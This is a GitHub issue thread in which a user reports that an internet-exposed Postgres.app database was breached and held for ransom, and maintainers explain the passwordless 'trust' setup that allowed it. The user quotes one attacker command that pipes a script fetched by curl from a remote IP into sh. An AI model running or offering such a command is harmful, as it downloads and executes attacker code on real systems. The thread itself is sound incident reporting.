### ISSUE TITLE
Remote hacking of PostgresApp ??

### ISSUE THREAD

**Issue by JLacal** [PostgresApp/PostgresApp#765]
Hello:

My local instance of PostgresApp was hacked and the data exfiltrated for ransom. See attached images.

Alternatively, the problem could be with PostgREST. (I'm filing a separate report there).

macOS: Sonoma 14.6

Hardware: an old mac Mini.
  Model Name:	Mac mini
  Model Identifier:	Macmini8,1
  Processor Name:	6-Core Intel Core i7
  Processor Speed:	3.2 GHz
  Number of Processors:	1
  Total Number of Cores:	6
  L2 Cache (per Core):	256 KB
  L3 Cache:	12 MB
  Hyper-Threading Technology:	Enabled
  Memory:	64 GB

This is the sequence of events:

01. I secured a fixed IP address from my local fiber provider on Friday July 26.

02. I opened port 5432 on the router and forwarded the port to the mac Mini's port 5432. Friday July 26 at 13:00 hr. UTC.

I sent the access credentials to my team (username and password).
I specifically changed the PostgresApp's password.

03. I also installed PostgREST, allowing anonymous, read-only access to the schema that was exfiltrated.

04. The PostgresApp has this setting "Ask for permission when apps connect without password." I believe the problem starts here.

05. Over the weekend I received several pop-up messages from the PostgresApp along the lines of "something wants to connect with app." I mindlessly accepted a couple of times, thinking it was my team members requesting remote access.

Today the mac Mini rebooted a couple of times. That was curious.

This afternoon the Terminal window in the mac Mini kept on saying "You have email"

When I looked at the mail messages I read several messages with this text:

"curl http://185.122.204.197/pg.sh | sh > /dev/null 2>&1"

That IP address seems to be registered to a Russian-based service provider.

The attackers left behind a new schema in the app: "readme_to_recover"

Question:

* What is the business value of the "Ask for permission when apps connect without password." setting? Is there a use for a remote connection with no password?

* How were the attackers able to create cron jobs at the OS level by  breaking through PostgresApp?
 

In any case, I just deleted the hard disk partitions and formatted the mac Mini's disk. I re-installed macOS on an empty partition.

Suggestions welcome. Regards.
![Uploading IMG_0150.png…]()

**Comment by tbussmann** [comment]
First of all - let me say that I'm sorry this happened to you. In fact, this is exactly the scenario we wanted to mitigate by adding the Permissions dialogue as an extra layer of security. You did a good job by completely reformatting your Mac as a precaution. Please make sure the rest of your local network is clean.

What's missing from your explanation are the steps you took to allow access from outside your Mac. This involves changing the `listen_address' parameter and editing `pg_haba.conf'. We assume that this was done in a way that the password you defined was not actually required by the server (`trust` authentication). We have some documentation on this [here](https://postgresapp.com/documentation/install.html#protecting-postgresql-with-a-password). If the connection required a password, the authentication dialogue wouldn't have been shown.

**Comment by jakob** [comment]
In addition, here are answers to your specific questions:

 > What is the business value of the "Ask for permission when apps connect without password." setting?

This feature is an additional security feature we built into Postgres.app to prevent unauthorised access. It shows a warning dialog only if authentication is disabled ("trust" authentication). We added this feature because the default configuration of Postgres.app trusts all connections from localhost by default.

>  Is there a use for a remote connection with no password?

Some users want to give access by IP address. For example, if you have an application running in a virtual machine or a docker image, you may want to grant that machine access with no password. We consider the practice insecure, so we added the warning even if the server is configured to allow such connections.

 > How were the attackers able to create cron jobs at the OS level by breaking through PostgresApp?

I assume that the attackers connected as a PostgreSQL superuser. PostgreSQL superusers can use various methods to execute code on the database server.
